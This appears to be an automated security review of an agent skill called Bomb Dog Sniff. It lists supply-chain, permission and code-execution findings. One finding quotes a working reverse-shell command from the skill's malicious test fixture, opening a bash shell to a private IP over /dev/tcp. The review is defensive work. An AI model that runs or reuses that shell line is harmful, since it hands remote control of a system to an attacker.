v0.1.0

Bomb Dog Sniff

ReviewClawScan verdict for this skill. Analyzed May 1, 2026, 5:29 AM.

Analysis

Bomb Dog Sniff appears to be a coherent security scanner, but its safe-install path can modify installed skills while running an unpinned external ClawHub package with the user's full environment.

GuidanceReview this carefully before installing. The scanner purpose is sensible, but avoid using safe-install on untrusted sources until the ClawHub helper is pinned and the subprocess environment is minimized. Prefer dry-run/manual review, verify the publisher and repository, and do not execute the included malicious test fixture files.

Findings (4)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

Abnormal behavior control

Checks for instructions or behavior that redirect the agent, misuse tools, execute unexpected code, cascade across systems, exploit user trust, or continue outside the intended task.

Agentic Supply Chain Vulnerabilities

SeverityHighConfidenceHighStatusConcern

safe-download.js

const child = spawn('npx', ['clawhub@latest', 'download', sanitizedName, skillPath], {

The safe-install path executes a package selected by the moving `latest` tag at runtime. Because this path is used to download skills that may then be installed, an unpinned helper package is a material supply-chain risk.

User impactA changed or compromised latest ClawHub package could run code during the install workflow and influence what gets downloaded or installed.

RecommendationPin the ClawHub helper to a reviewed version, verify package provenance/signatures, or use a bundled/download-only client that does not execute an unpinned package.

Tool Misuse and Exploitation

SeverityLowConfidenceHighStatusNote

SKILL.md

Download from clawhub/GitHub, scan, and install only if safe.

Installing skills is central to the stated purpose and is disclosed, but it is still high-impact because it changes the agent's installed capabilities.

User impactIf the scanner misses a risky skill or the source is not trustworthy, safe-install can add that skill to the user's OpenClaw environment.

RecommendationUse `--dry-run` for unfamiliar sources, review findings manually, and prefer known/pinned sources before allowing installation.

Unexpected Code Execution

SeverityMediumConfidenceMediumStatusNote

test/malicious-skill/index.js

exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");

The package includes runnable malicious sample code in a test-fixture path. That appears purpose-aligned for scanner testing, but it would be dangerous if executed directly.

User impactAccidentally running the malicious test fixture could attempt behavior such as a reverse shell or credential exfiltration.

RecommendationKeep malicious fixtures inert where possible, do not execute test fixture files directly, and consider storing payloads as quoted test data rather than runnable scripts.

Permission boundary

Checks whether tool use, credentials, dependencies, identity, account access, or inter-agent boundaries are broader than the stated purpose.

Identity and Privilege Abuse

SeverityMediumConfidenceHighStatusConcern

safe-download.js

env: { ...process.env, NODE_NO_WARNINGS: '1' },

The external ClawHub downloader subprocess receives the entire environment even though the registry declares no required environment variables or primary credential. Environment variables often contain unrelated API keys, tokens, or account configuration.

User impactUnrelated credentials present in the user's environment could be exposed to a child process that is not narrowly scoped to this skill's purpose.

RecommendationPass a minimal allowlisted environment to child processes and declare any required credentials explicitly.